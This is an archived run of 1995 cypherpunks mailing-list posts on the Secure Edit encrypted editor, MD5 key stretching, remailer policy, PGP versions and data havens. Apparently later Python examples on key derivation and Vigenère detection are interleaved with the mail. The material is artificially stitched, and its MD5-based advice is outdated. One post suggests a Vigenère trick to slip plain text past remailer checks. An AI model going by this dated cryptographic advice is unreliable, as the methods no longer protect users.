> The paper is in the directory pub/brands, under the name
> "latin95.<ext>." The extension <ext> refers to dvi and PostScript
> formats.
>
> Greetings
>
> Stefan Brands,
> ------------------------------------------------------
> CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands
> Tel: +31 20 5924103, e-mail: brands@cwi.nl
>
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:31:19 PST
To: cypherpunks@toad.com
Subject: Paper on NetCheque and requirements of network payment services
Message-ID: <v01510101ab3b6bb5b201@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>From: bcn@ISI.EDU
>Date: Thu, 12 Jan 1995 11:11:49 -0800
>Posted-Date: Thu, 12 Jan 1995 11:11:49 -0800
>Original-From: Clifford Neuman <bcn@ISI.EDU>
>To: www-buyinfo@allegra.att.com
>Subject: Paper on NetCheque and requirements of network payment services
>Status: U
>
>There is a new paper available on NetCheque(TM) and requirement of
>network payment services.  The paper will be presented at IEEE Compcon
>in March.  The paper can be retrieved from prospero.isi.edu in
>
>/pub/netcheque/information/netcheque-requirements-compcon95.ps.Z.
>
>Clifford Neuman

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Thu, 12 Jan 95 17:33:12 PST
To: cypherpunks@toad.com
Subject: Re: RELEASE: Secure Edit beta 0.5
Message-ID: <v02110101ab3b85b46606@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 PM 1/12/95, Tom Bryce wrote:
>[. . .]
>* the salt is concatenated with MD5[passphrase] many times and this
>concatenated string hashed to generate the 'session key' for the file
>from your pass phrase. The number of times it is concatenated is
>calibrated to make it take about half a second - not a big performance
>loss, but it makes brute force attack of weak passphrases up to
>thousands of times more costly.
>[. . . .]

This is only going to work if MD5 is not a "group"--that is, if there is no
simple algorithm which is equivalent to md5(md5(x)). I doubt that's been
proven.

Rather, you'd be better off using DES in any of the ways that Schneier
describes (page 338 and following) and reiterate that many times.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Thu, 12 Jan 95 10:52:56 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <Pine.3.89.9501121847.A13935-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Russell Nelson wrote:

> I really *don't* think that New York State plans to
> ban encryption, not now and not over this issue anyway.  His thrust is
> 1) to have the legal authority to sufficiently punish someone who goes
> after children (which they don't have now), and 2) to educate guardians
> about the risks of untoward communications from adults to children.

But what happens if, say, a minor is solicited for sex when they are
pretending to be older than they are ? Or if the solicitation comes via a
remailer ?  Or a minor with a grudge fakes email to show that someone 
attempted to get them to agree to sex/picture-taking or whatever ?

Once you pass laws making some forms of communication illegal, you're 
immediately getting into dodgy territory requiring is-a-person 
credentials and so on. That isn't necessarily a problem if it's voluntary 
(e.g. your kids accounts might be set up to only accept mail from people 
who're certified to be under 18 or whatever), but governments are 
unlikely to do things that way.

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 16:11:42 PST
To: cypherpunks@toad.com
Subject: RELEASE: Secure Edit beta 0.5
Message-ID: <v01510103ab3b73cfd8be@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----


               RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is
now available for FTP from ripem.msu.edu in the directory pub/crypt/mac,
and at other ITAR-compliant sites. Finger tjbryce@amherst.edu for an
updated site list, as well as information on other products by miyako
software. All releases are signed with the Miyako Software public PGP
key.

Version b0.5 sports the following new features:

FOR EASE OF USE AND UTILITY:
* extensive balloon help
* an undo command
* print command
* a find command (useful for storing sensitive information with secure
edit)
* windows menu with tile and stack commands
* copy with line breaks inserted, for composing email or pgp messages
* much better and faster compression and a smaller base file size
* secure edit now uses Colin Plumb's fast 68k assembly IDEA
implementation
* you can turn off the annoying  marks
* the menu blinking clunky has been fixed
* the window update annoyance has been fixed
* various interface clunkies have been fixed
* new and more intuitive icons have been drawn

FOR SECURITY:
* much better random number management using the code written by Colin
Plumb for PGP
* random data is snarfed from all events the application observes
(such as your keystrokes), the time these events occur, and by
continuously tracking your mouse position, even when backgrounded. the
pool of random data is maintained between sessions and is encrypted
based on these random events before it is written to disk and before
use.
* so that every file is encrypted on a different IDEA key, making
cryptanalysis of one useless against others, your key is salted with 128
bits of random data, stored in the clear for decryption, to make a
'session key'. thus, the key used to encrypt every file will be
different, even if you used the same passphrase. this makes
cryptanalysis of one file useless against others.
* the salt is concatenated with MD5[passphrase] many times and this
concatenated string hashed to generate the 'session key' for the file
from your pass phrase. The number of times it is concatenated is
calibrated to make it take about half a second - not a big performance
loss, but it makes brute force attack of weak passphrases up to
thousands of times more costly.
* semi-splay compression is utilized, which is faster than the lame
old compression (written by me :( ) and which gets >50% file reduction.
It strengthens the encryption by reducing the redundancy in the
plaintext. It also continually modifies the compression encoding system
based on the data as it goes along, making the interpretation of
compressed data dependent on the data that has come before it
* you can verify keys against Curve Encrypt keyfiles
* documents that are saved in plaintext format clearly distinguished
by "TEXT:" in the window title
* the source code has been cleaned up :-) and much improved to make it
easier to verify yourself that the program is strong and secure.

                           ------THE BASICS------
                           (from version a 0.3.4)

SECURE EDIT is an editor designed for editing sensitive text buffers.
It is designed to prevent plaintext from ever being written to disk,
even if only momentarily. You might fail to overwrite or encrypt such
plaintext properly, or your opponent might be able to retrieve some of
the information even though you wiped it (see docs for details). Word
Processors generally create temp and scratch files that leave plaintext
on your drive whether you like it or not. Secure edit fixes this
problem. Sometimes you need to quit in a hurry and have all your data
encrypted and saved. Or you might prefer to have your files encrypted at
all times so that you never forget to re-encrypt a file you worked on,
and so that files are never in plaintext form while you are working with
them. Secure edit sports the following features to serve these and other
data security needs:

* Plaintext is never written to disk - Secure Edit locks all sensitive
buffers in memory so that virtual memory will never swap them to disk.
This includes the text you are editing as well as any encryption keys in
use.

* Secure Edit never creates plaintext temp or scratch files

* Secure Edit offers the option of saving files directly in encrypted
format so you never have plaintext on the hard drive.

* Your data is compressed and encrypted in RAM with the IDEA
algorithm, then written to disk in encrypted format.

* Secure Edit can maintain a secure, private clipboard, interconverting
with the system clipboard only when you use OPTION-cut,copy, and paste.
This prevents the system from getting a copy of your sensitive data and
possibly writing it to disk, or leaving it around for another user to
see.

* Secure Edit can open foreign text files, and DOD wipe them on
request when you save the file in encrypted format.

* Secure Edit offers a default passphrase option so you only need to
enter your passphrase once. It also offers the option of validating your
phrase against secure validation information that can be used to check
that you have entered your standard pass phrase, but which cannot be
used to recover the passphrase. This prevents you from saving under a
bad passphrase and losing data.

* Secure Edit offers a time-out option, whereby it will save all files
and quit after a certain idle time period

* Secure Edit offers an option-quit feature, whereby it will assume it
is okay to save all files, and save and quit as quickly as possible

* Secure Edit is available to U.S. citizens in the U.S. at an
ITAR-compliant site near you. I'm presently uploading it to
ripem.msu.edu and others.

* source code is, of course, available.

* Questions about Secure Edit should be directed to me, at
<tjb@acpub.duke.edu>

Thanks for your attention.

Tom Bryce

/////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*---------------------------------------------------------*
Miyako Software is dedicated to creating freeware to help
make computers tools of personal liberation and expression.
for product info and PGP key, finger <tjbryce@amherst.edu>
                email: <tjb@acpub.duke.edu>
*---------------------------------------------------------*
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_/////////////////////////////

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxN4F08YjrUhOUC5AQGueAQAkJNvwUO5QVZd9FQnfwm2HnKiFH/DvAUQ
2TWkrqhRJ2R06Ht98Vrw/ixacQLP9GEobKlK1WDdQE/lNZGre2IgLS0lXm39F1ll
A0wSIpRrJ5wK2KlWEbq1e5cuaooA/+Y2C6U7RAQbj+/wF9/9FqKvzmLAzYgx2pqD
VxDCzkn2A4s=
=d0DX
-----END PGP SIGNATURE-----


------------------------------------------------------------------------
             /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\
            |               Tom Bryce                  |____|
  ___       |               Duke  Med                  |         ___
{~._.~}     |           tjb@acpub.duke.edu             |       {~._.~)
 ( Y )      |   PGP keys: finger tjbryce@amherst.edu   |        ( Y )
()~*~()     |personal:9B6088464ED86413 0F5E55E45CF1C961|       ()~*~()
(_)-(_)     |miyako                                    |       (_)-(_)
            |software:02646F0B06DCFE03 E6DD367DB4E1010F|
         /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/   |
         \_________________________________________\__/
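
The salted, calibrated key derivation described in this release note (and questioned in Ben Goren's reply earlier in the archive), as an added example that is not Secure Edit's source code: `stretch_md5` follows one reading of the note's wording, and the function names, probe size and PBKDF2 comparison are assumptions made for this illustration.

```python
"""Salted, stretched passphrase-to-key derivation (added example)."""
import hashlib
import os
import time


def stretch_md5(passphrase: bytes, salt: bytes, repeats: int) -> bytes:
    """One reading of the release note: hash the string formed by repeating
    (salt || MD5(passphrase)) `repeats` times. Output is 128 bits, the size
    of an IDEA key. The string is streamed into MD5 rather than built in RAM."""
    if repeats < 1:
        raise ValueError("repeats must be at least 1")
    unit = salt + hashlib.md5(passphrase).digest()
    h = hashlib.md5()
    for _ in range(repeats):
        h.update(unit)
    return h.digest()


def calibrate(target_seconds: float = 0.5, probe: int = 20000) -> int:
    """Time a probe run and scale `repeats` so that one derivation costs
    roughly `target_seconds` on this machine."""
    start = time.perf_counter()
    stretch_md5(b"calibration", os.urandom(16), probe)
    elapsed = max(time.perf_counter() - start, 1e-9)
    return max(1, int(probe * target_seconds / elapsed))


def new_file_key(passphrase: bytes, repeats: int):
    """Fresh 128-bit salt per file; the salt and repeat count are stored in
    the clear beside the ciphertext so the key can be re-derived."""
    salt = os.urandom(16)
    return salt, stretch_md5(passphrase, salt, repeats)


def stretch_pbkdf2(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Standardized iterated construction for comparison: PBKDF2-HMAC-SHA256
    feeds each round's output into the next instead of hashing one long string."""
    return hashlib.pbkdf2_hmac("sha256", passphrase, salt, iterations, dklen=16)


if __name__ == "__main__":
    repeats = calibrate()
    salt_a, key_a = new_file_key(b"same passphrase", repeats)
    salt_b, key_b = new_file_key(b"same passphrase", repeats)
    print("repeats for about 0.5 s:", repeats)
    print("two files, same passphrase, same key?", key_a == key_b)  # False
    print("re-derived from stored salt:",
          stretch_md5(b"same passphrase", salt_a, repeats) == key_a)  # True
```

The repeat count has to travel with the file: a value calibrated on one machine is what the decrypting machine must use, however fast or slow it is.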






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Thu, 12 Jan 95 17:46:19 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501130137.AA03281@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
> ... Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.

Perhaps I missed this, but why?  If someone is going to plant kiddie porn or 
whatever on you, does it really matter if they encrypt it first or not?

If the purpose is simply to generate additional encrypted traffic to obscure 
stuff that needs encryption, that goal might be better served by simply 
encrypting files for their recipient as they pass through, in those cases 
where a public key is available and the msg isn't already encrypted.

I forget the name of the cypher (Vigenere, perhaps--the one that uses a series 
of Caesar-like cyphers keyed by a password), but you could just run it 
through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten 
out the distribution enough to get it by casual inspection.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com
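
The flattening trick in the message above, seen from the side of an operator who has to decide whether a body is "not human readable". This is an added Python example, not code from the thread; the sample text is constructed, and the function names and the choice to advance the key only on letters are assumptions.

```python
import string
from collections import Counter

KEY = string.ascii_lowercase  # the password suggested in the post

# Constructed sample plaintext (lower-case English prose, about 900 letters).
SAMPLE = (
    "a remailer accepts a message strips the headers that identify the sender "
    "and forwards the body to the next hop in the chain the operator would "
    "rather not know what the body says because knowledge of the contents is "
    "what a complainant will point to later so the policy under discussion is "
    "that anything passing through should not be human readable the question "
    "for the operator is how to tell whether a body is really encrypted or "
    "merely scrambled enough to look that way at a glance a letter count is "
    "the first thing anyone tries since ordinary english prose has a very "
    "uneven distribution of letters while good ciphertext looks uniform the "
    "trouble is that a simple polyalphabetic shift also looks uniform when "
    "the key cycles through the whole alphabet and that is the case the "
    "check below is meant to catch before the message is passed along "
    "a second look groups the letters by position modulo a guessed period "
    "and counts again inside each group where the shift is constant and the "
    "familiar unevenness of plain language returns immediately "
)


def vigenere(text, key=KEY, decrypt=False):
    """Shift each ASCII letter by the next key letter; other characters pass through."""
    out, k = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("a") if ch.islower() else ord("A")
            shift = ord(key[k % len(key)]) - ord("a")
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1  # assumption: the key advances only on letters
        else:
            out.append(ch)
    return "".join(out)


def letters(text):
    """Lower-cased ASCII letters of text, in order."""
    return [c for c in text.lower() if c in string.ascii_lowercase]


def ic(seq):
    """Index of coincidence: chance that two letters drawn from seq are equal.
    Roughly 0.066 for English prose and 1/26 = 0.038 for a uniform distribution."""
    n = len(seq)
    if n < 2:
        return 0.0
    counts = Counter(seq)
    return sum(v * (v - 1) for v in counts.values()) / (n * (n - 1))


def column_ic(text, period):
    """Mean index of coincidence over the letters at each position modulo period."""
    ls = letters(text)
    columns = [ls[i::period] for i in range(period)]
    return sum(ic(col) for col in columns) / period


if __name__ == "__main__":
    cipher = vigenere(SAMPLE)
    print("plaintext, whole-message IC :", round(ic(letters(SAMPLE)), 4))
    print("flattened, whole-message IC :", round(ic(letters(cipher)), 4))
    for period in (7, 13, 26):
        print("flattened, IC at period", period, ":", round(column_ic(cipher, period), 4))
```

A whole-message letter count sees the flattened text as uniform, while grouping by the key length brings the English skew straight back, so a flat histogram alone does not show that a body is encrypted.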





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Thu, 12 Jan 95 13:12:58 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
In-Reply-To: <9501122019.AA14798@pilot.njin.net>
Message-ID: <Pine.3.89.9501122157.A13935-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Frederic Halper wrote:

> Any person no matter their age should be wary if someone solicits them 
> for sex.

I agree, however it does seem to be a bit much for a horny geek who
propositions a supposed 21-year old who turns out to be 14 to be sent to
jail and forever marked as an EVIL PEDOPHILE, rather than just being told
to get a life. Particularly if, say, the girl in question was posting to
alt.sex.wanted or something.

But the main point I was trying to make here is that with laws like this
proof of age would be required in both directions. Of course, a system
that stamped each user's age on outgoing messages could well lead to more
real-world abuse by the real crazies, not less... 

			Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Thu, 12 Jan 95 19:49:37 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501130137.AA03281@eri.erinet.com>
Message-ID: <N3V5lG9s1WC8075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501130137.AA03281@eri.erinet.com>,
pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
> > ... Seems to me that a quite reasonable condition of use of a remailer is
> >that what is passed isn't human readable.
> 
> Perhaps I missed this, but why?  If someone is going to plant kiddie porn or 
> whatever on you, does it really matter if they encrypt it first or not?
> 

The goal is to convince the two groups of concerned parties that the
remailer operators don't know the contents of what's passing through
their remailers:

         (1) the people who use the remailer, who get a measure of 
             comfort from knowing their communication is secure

         (2) legal groups etc. who may try to hold the remailer 
             liable in some way for what passes through their remailer.

A large percentage of material that passes through remailers might
be offensive to SOMEONE---if even just because an unpopular opinion
is expressed.  

The remailers are operated by people who want to promote information
flow, not restrict it.  They provide an important service that is of
critical importance to some people and groups who use the net.  They
shouldn't be held accountable for the few who abuse the remailers,
and encryption helps prevent that from happening.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Thu, 12 Jan 95 19:21:32 PST
To: cypherpunks@toad.com
Subject: Keyboard sniffer source code
Message-ID: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Not to be paranoid, but did anybody receive that program?

Does cypherpunkcs@toad.com have a pgp key?

I think it was intercepted.

mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Thu, 12 Jan 95 21:51:26 PST
To: cypherpunks@toad.com
Subject: Some PGP problems
Message-ID: <199501130551.VAA01278@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I'm trying to decode a PGP file that was created with Ver 2.6.
At this time,  I thought that my older ver 2.1c (Running on a
Mac) would at least be able to decrypt something made from
a higher version,  running on a PC.   Apparently that is not so.

So,  the next thing I did,   or what any self respecting
Cypherpunk might do,   is to go out on the net and look
for a later version to FTP.   Well,   after discovering
that soda.berkeley.edu don't exist anymore,  I eventually
found the ftp site where it lives.  ftp.csua.berkeley.edu.

I learn that Mac PGP2.3 exists,  but NO version 2.6
exists for the Mac.   Is that true?    If not,  then
where can I get a copy,  so I can decode a message
created with 2.6?    If ver 2.3 will decode a message
encoded with 2.6,  then I'm faced with how I can
extract this Mac file which has a .gz extension.
Binhex don't seem to decode it.  So,  I now got this
file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
I supposed to have used some special UNIX utility to
convert the .gz thingie first?    Please enlighten
this confused cypherpunker!!! :-)   Or will I even have
to do all of this because 2.3 is incompatible with 2.6.

C. Crunch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 22:02:15 PST
To: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Subject: Re: Purpose of Data Havens
In-Reply-To: <199501121810.NAA25089@bb.hks.net>
Message-ID: <Pine.3.89.9501122152.A28265-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, L. McCarthy wrote:

> Scenario: June is a test engineer at Rockwell Intl. At the lab where she works,
> it is observed that some rubber O-rings being designed for the space shuttle
> are liable to crack, and lose their airtight seal, when exposed to the 
> extremely low temperatures of space. The project is behind, so the researchers
> are instructed to proceed in spite of the problem. June encrypts the test
> results and deposits them in a data haven.

Digression:  

The interesting thing is that NASA was damn near able
to keep this matter secret despite the project's chief engineer kicking
and screaming.

When Feynman wandered in to Morton Thiokol and started asking questions 
he was not met with a cover up -- instead he was told the whole story,
complete with the chart that led the chief booster engineer, with
the support of the entire engineering team, to send email and
written reports that the Challenger would blow up unless the launch
was delayed.

And despite one of the world's most famous scientists knowing the
truth, and despite the fact that he was the only scientist on
the commission of enquiry, they still might well have kept it quiet
if Feynman had not ambushed them on TV.

And despite Feynman's ambush, they still managed pretty good
damage control.

Of course today such a cover up would never succeed -- someone
would just mail it to the internet, and the story would blow.

But the fact is the cover up largely succeeded despite the efforts
of the Chief engineer (which got him blacklisted) and despite
the theatric efforts of one of the world's most eminent
scientists, perhaps the most eminent living scientist of 
that time.

It makes me realize that the world has already changed, vastly
for the better, and those in power do not yet realize it.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Thu, 12 Jan 95 19:21:04 PST
To: cypherpunks@toad.com
Subject: How "good" is MDC?
Message-ID: <9501130321.AA03497@toad.com>
MIME-Version: 1.0
Content-Type: text


I've been toying with a homegrown implementation of the MDC algorithm,
similar to the one used in HPack, written mostly in 386 assembler though.
My version also scrambles the constants by multiple cycles over the key,
so it should be better than vanilla MD5... I'm wondering how "secure" MDC
is, though... are there better hashing algorithms or possible modifications
that could be made?

(A silly question considering I haven't yet released the sources.  When
they are ready I'll post an announcement or something.)

  Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 19:25:28 PST
To: cypherpunks@toad.com
Subject: Re: RELEASE: Secure Edit beta 0.5
Message-ID: <v01510102ab3ba3ffa431@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


Ben Goren wrote:

>At 5:18 PM 1/12/95, Tom Bryce wrote:
>>[. . .]
>>* the salt is concatenated with MD5[passphrase] many times and this
>>concatenated string hashed to generate the 'session key' for the file
>>from your pass phrase. The number of times it is concatenated is
>>calibrated to make it take about half a second - not a big performance
>>loss, but it makes brute force attack of weak passphrases up to
>>thousands of times more costly.
>>[. . . .]
>
>This is only going to work if MD5 is not a "group"--that is, if there is no
>simple algorithm which is equivalent to md5(md5(x)). I doubt that's been
>proven.

This is not exactly what secure edit does. It hashes in the following
manner to generate a session key:

MD5 [ (128-bit salt) MD5[passphrase] 0 MD5[passphrase] 1 MD5[passphrase] 2 ... ]
to get the session key. The 0, 1, 2 is a single byte. So there is only one
level of nesting of the hashes. This is actually a common and well-regarded
technique for increasing the security of weak passphrases.

Tom



------------------------------------------------------------------------
             /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\
            |               Tom Bryce                  |____|
  ___       |               Duke  Med                  |         ___
{~._.~}     |           tjb@acpub.duke.edu             |       {~._.~)
 ( Y )      |   PGP keys: finger tjbryce@amherst.edu   |        ( Y )
()~*~()     |personal:9B6088464ED86413 0F5E55E45CF1C961|       ()~*~()
(_)-(_)     |miyako                                    |       (_)-(_)
            |software:02646F0B06DCFE03 E6DD367DB4E1010F|
         /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/   |
         \_________________________________________\__/
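
The session-key derivation described in the message above, as an added Python sketch; it is not Secure Edit's source. The counter wrapping after 255, the doubling calibration loop, the function names and keeping the round count next to the salt are assumptions.

```python
import hashlib
import os
import time

SALT_BYTES = 16  # the 128-bit salt, stored in the clear with each file


def session_key(passphrase: bytes, salt: bytes, rounds: int) -> bytes:
    """MD5[ salt | H | 0 | H | 1 | H | 2 | ... ] with H = MD5[passphrase]."""
    if len(salt) != SALT_BYTES:
        raise ValueError("salt must be 16 bytes")
    if rounds < 1:
        raise ValueError("rounds must be at least 1")
    inner = hashlib.md5(passphrase).digest()  # the only nested hash
    outer = hashlib.md5(salt)
    for i in range(rounds):
        outer.update(inner)
        outer.update(bytes([i & 0xFF]))  # assumption: the single byte wraps after 255
    return outer.digest()  # 128 bits, the size of an IDEA key


def md5_blocks(nbytes: int) -> int:
    """Number of 64-byte compression calls MD5 makes for an nbytes-long input."""
    return (nbytes + 8) // 64 + 1  # padding adds one marker byte and 8 length bytes


def guess_cost(rounds: int, passphrase_len: int = 20) -> int:
    """Compression calls paid per passphrase guess: inner hash plus stretched outer hash."""
    return md5_blocks(passphrase_len) + md5_blocks(SALT_BYTES + 17 * rounds)


def calibrate(target_seconds: float = 0.5, start: int = 1024) -> int:
    """Double the round count until one derivation takes at least target_seconds here."""
    rounds = start
    salt = bytes(SALT_BYTES)
    while True:
        t0 = time.perf_counter()
        session_key(b"calibration passphrase", salt, rounds)
        if time.perf_counter() - t0 >= target_seconds:
            return rounds
        rounds *= 2


def new_file_key(passphrase: bytes, rounds: int):
    """Fresh random salt per file, so one passphrase never yields the same key twice."""
    salt = os.urandom(SALT_BYTES)
    return salt, session_key(passphrase, salt, rounds)


if __name__ == "__main__":
    rounds = calibrate()
    # Assumption: rounds is saved beside the salt, since a machine of a
    # different speed would calibrate to a different count when decrypting.
    salt_a, key_a = new_file_key(b"correct horse", rounds)
    salt_b, key_b = new_file_key(b"correct horse", rounds)
    print("rounds for about 0.5 s on this machine:", rounds)
    print("same passphrase, different file keys:", key_a != key_b)
    print("MD5 compression calls per guess:", guess_cost(rounds),
          "against", md5_blocks(20), "for a bare MD5[passphrase]")
```

Because the salt leads the hashed string, none of the outer hash can be precomputed across files; only the 16-byte MD5[passphrase] can be reused from one guess list to the next.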






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 19:33:07 PST
To: cypherpunks@toad.com
Subject: RELEASE: secure edit, resend (was bad pgp signature)
Message-ID: <v01510104ab3ba6452cd2@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


It's been brought to my attention that I messed up and the pgp signature
did not validate my post about secure edit.

I'm not sure where exactly I messed up, but here goes again... sorry for
sending it twice. :(


-----BEGIN PGP SIGNED MESSAGE-----



               RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is
now available for FTP from ripem.msu.edu in the directory pub/crypt/mac,
and at other ITAR-compliant sites. Finger tjbryce@amherst.edu for an
updated site list, as well as information on other products by miyako
software. All releases are signed with the Miyako Software public PGP
key.

Version b0.5 sports the following new features:

FOR EASE OF USE AND UTILITY:
* extensive balloon help
* an undo command
* print command
* a find command (useful for storing sensitive information with secure
edit)
* windows menu with tile and stack commands
* copy with line breaks inserted, for composing email or pgp messages
* much better and faster compression and a smaller base file size
* secure edit now uses Colin Plumb's fast 68k assembly IDEA
implementation
* you can turn off the annoying  marks
* the menu blinking clunky has been fixed
* the window update annoyance has been fixed
* various interface clunkies have been fixed
* new and more intuitive icons have been drawn

FOR SECURITY:
* much better random number management using the code written by Colin
Plumb for PGP
* random data is snarfed from all events the application observes
(such as your keystrokes), the time these events occur, and by
continuously tracking your mouse position, even when backgrounded. the
pool of random data is maintained between sessions and is encrypted
based on these random events before it is written to disk and before
use.
* so that every file is encrypted on a different IDEA key, making
cryptanalysis of one useless against others, your key is salted with 128
bits of random data, stored in the clear for decryption, to make a
'session key'. thus, the key used to encrypt every file will be
different, even if you used the same passphrase. this makes
cryptanalysis of one file useless against others.
* the salt is concatenated with MD5[passphrase] many times and this
concatenated string hashed to generate the 'session key' for the file
from your pass phrase. The number of times it is concatenated is
calibrated to make it take about half a second - not a big performance
loss, but it makes brute force attack of weak passphrases up to
thousands of times more costly.
* semi-splay compression is utilized, which is faster than the lame
old compression (written by me :( ) and which gets >50% file reduction.
It strengthens the encryption by reducing the redundancy in the
plaintext. It also continually modifies the compression encoding system
based on the data as it goes along, making the interpretation of
compressed data dependent on the data that has come before it
* you can verify keys against Curve Encrypt keyfiles
* documents that are saved in plaintext format clearly distinguished
by "TEXT:" in the window title
* the source code has been cleaned up :-) and much improved to make it
easier to verify yourself that the program is strong and secure.

                           ------THE BASICS------
                           (from version a 0.3.4)

SECURE EDIT is an editor designed for editing sensitive text buffers.
It is designed to prevent plaintext from ever being written to disk,
even if only momentarily. You might fail to overwrite or encrypt such
plaintext properly, or your opponent might be able to retrieve some of
the information even though you wiped it (see docs for details). Word
Processors generally create temp and scratch files that leave plaintext
on your drive whether you like it or not. Secure edit fixes this
problem. Sometimes you need to quit in a hurry and have all your data
encrypted and saved. Or you might prefer to have your files encrypted
at all times so that you never forget to re-encrypt a file you worked
on, and so that files are never in plaintext form while you are working
with them. Secure edit sports the following features to serve these and
other data security needs:

* Plaintext is never written to disk - Secure Edit locks all sensitive
buffers in memory so that virtual memory will never swap them to disk.
This includes the text you are editing as well as any encryption keys
in use.

* Secure Edit never creates plaintext temp or scratch files

* Secure Edit offers the option of saving files directly in encrypted
format so you never have plaintext on the hard drive.

* Your data is compressed and encrypted in RAM with the IDEA
algorithm, then written to disk in encrypted format.

* Secure Edit can maintain a secure, private clipboard, interconverting
with the system clipboard only when you use OPTION-cut,copy, and paste.
This prevents the system from getting a copy of your sensitive data and
possibly writing it to disk, or leaving it around for another user to
see.

* Secure Edit can open foreign text files, and DOD wipe them on
request when you save the file in encrypted format.

* Secure Edit offers a default passphrase option so you only need to
enter your passphrase once. It also offers the option of validating
your phrase against secure validation information that can be used to
check that you have entered your standard pass phrase, but which cannot
be used to recover the passphrase. This prevents you from saving under a
bad passphrase and losing data.

* Secure Edit offers a time-out option, whereby it will save all files
and quit after a certain idle time period

* Secure Edit offers an option-quit feature, whereby it will assume it
is okay to save all files, and save and quit as quickly as possible

* Secure Edit is available to U.S. citizens in the U.S. at an
ITAR-compliant site near you. I'm presently uploading it to
ripem.msu.edu and others.

* source code is, of course, available.

* Questions about Secure Edit should be directed to me, at
<tjb@acpub.duke.edu>

Thanks for your attention.

Tom Bryce

